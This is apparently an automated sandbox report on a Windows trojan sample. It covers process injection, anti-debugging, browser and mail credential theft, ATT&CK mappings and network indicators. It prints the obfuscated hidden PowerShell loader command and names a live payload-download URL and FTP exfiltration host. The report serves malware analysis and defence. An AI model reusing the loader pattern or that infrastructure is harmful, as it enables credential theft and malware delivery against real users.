              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6387Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3330Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000006.00000002.2931037935.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8j8j
              Source: msiexec.exe, 00000006.00000002.2931037935.0000000000709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2931037935.00000000006DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\24100311.EXE.exeAPI call chain: ExitProcess graph end nodegraph_0-3779
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00B0F348 LdrInitializeThunk,LdrInitializeThunk,1_2_00B0F348
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A40000Jump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden "$forglemmelser=get-content -raw 'c:\users\user\appdata\local\decentraliseringers\misdidived\unengrossing\independable.ovi';$fellifluous=$forglemmelser.substring(7655,3);.$fellifluous($forglemmelser)"
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden "$forglemmelser=get-content -raw 'c:\users\user\appdata\local\decentraliseringers\misdidived\unengrossing\independable.ovi';$fellifluous=$forglemmelser.substring(7655,3);.$fellifluous($forglemmelser)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7860, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7860, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000006.00000002.2947539010.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7860, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Obfuscated Files or Information
              1
              OS Credential Dumping
              3
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              1
              Exfiltration Over Alternative Protocol
              1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              1
              Software Packing
              LSASS Memory24
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)311
              Process Injection
              1
              DLL Side-Loading
              Security Account Manager221
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object Model1
              Clipboard Data
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script241
              Virtualization/Sandbox Evasion
              LSA Secrets241
              Virtualization/Sandbox Evasion
              SSHKeylogging23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Access Token Manipulation
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524867 Sample: 24100311.EXE.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 23 ftp.rusticpensiune.ro 2->23 25 www.corella.ro 2->25 27 corella.ro 2->27 41 Suricata IDS alerts for network traffic 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 3 other signatures 2->47 8 24100311.EXE.exe 2 23 2->8         started        signatures3 process4 file5 21 C:\Users\user\AppData\...\Independable.Ovi, ASCII 8->21 dropped 49 Suspicious powershell command line found 8->49 12 powershell.exe 26 8->12         started        signatures6 process7 signatures8 51 Early bird code injection technique detected 12->51 53 Writes to foreign memory regions 12->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 12->55 57 3 other signatures 12->57 15 msiexec.exe 15 8 12->15         started        19 conhost.exe 12->19         started        process9 dnsIp10 29 ftp.rusticpensiune.ro 185.146.87.128, 21, 49543, 49737 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 15->29 31 corella.ro 109.73.128.91, 443, 49736 DJEMBA-ASRO Spain 15->31 33 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->33 35 Tries to steal Mail credentials (via file / registry access) 15->35 37 Tries to harvest and steal browser information (history, passwords, etc) 15->37 39 Hides threads from debuggers 15->39 signatures11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              24100311.EXE.exe11%ReversingLabsWin32.Trojan.InjectorX
              24100311.EXE.exe15%VirustotalBrowse
              24100311.EXE.exe100%AviraHEUR/AGEN.1331786
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              ftp.rusticpensiune.ro1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://www.corella.ro/0%VirustotalBrowse
              http://ftp.rusticpensiune.ro1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              corella.ro
              109.73.128.91
              truefalse
                unknown
                ftp.rusticpensiune.ro
                185.146.87.128
                truetrueunknown
                www.corella.ro
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.corella.ro/D5msiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2040294187.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.corella.ro/msiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2040294187.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binAmsiexec.exe, 00000006.00000002.2931037935.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://contoso.com/powershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.2042824173.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binKokisUrawww.creditesimplebm.ro/tmp-image/msiexec.exe, 00000006.00000002.2946495620.0000000021670000.00000004.00001000.00020000.00000000.sdmpfalse
                          unknown
                          http://nsis.sf.net/NSIS_ErrorError24100311.EXE.exefalse
                          • URL Reputation: safe
                          unknown
                          http://ftp.rusticpensiune.romsiexec.exe, 00000006.00000002.2947539010.0000000022005000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2040294187.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2947539010.0000000021FF7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://aka.ms/pscore6lBtqpowershell.exe, 00000001.00000002.2040294187.0000000004A51000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2040294187.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            109.73.128.91
                            corella.roSpain
                            49674DJEMBA-ASROfalse
                            185.146.87.128
                            ftp.rusticpensiune.roRomania
                            5588GTSCEGTSCentralEuropeAntelGermanyCZtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1524867
                            Start date and time:2024-10-03 10:50:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 22s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:24100311.EXE.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@17/14@2/2
                            EGA Information:
                            • Successful, ratio: 33.3%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 124
                            • Number of non-executed functions: 38
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target msiexec.exe, PID 7860 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            04:50:59API Interceptor39x Sleep call for process: powershell.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.146.87.128LisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                    ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                      BESTELLU.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        Ordine_nr.24061168372.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
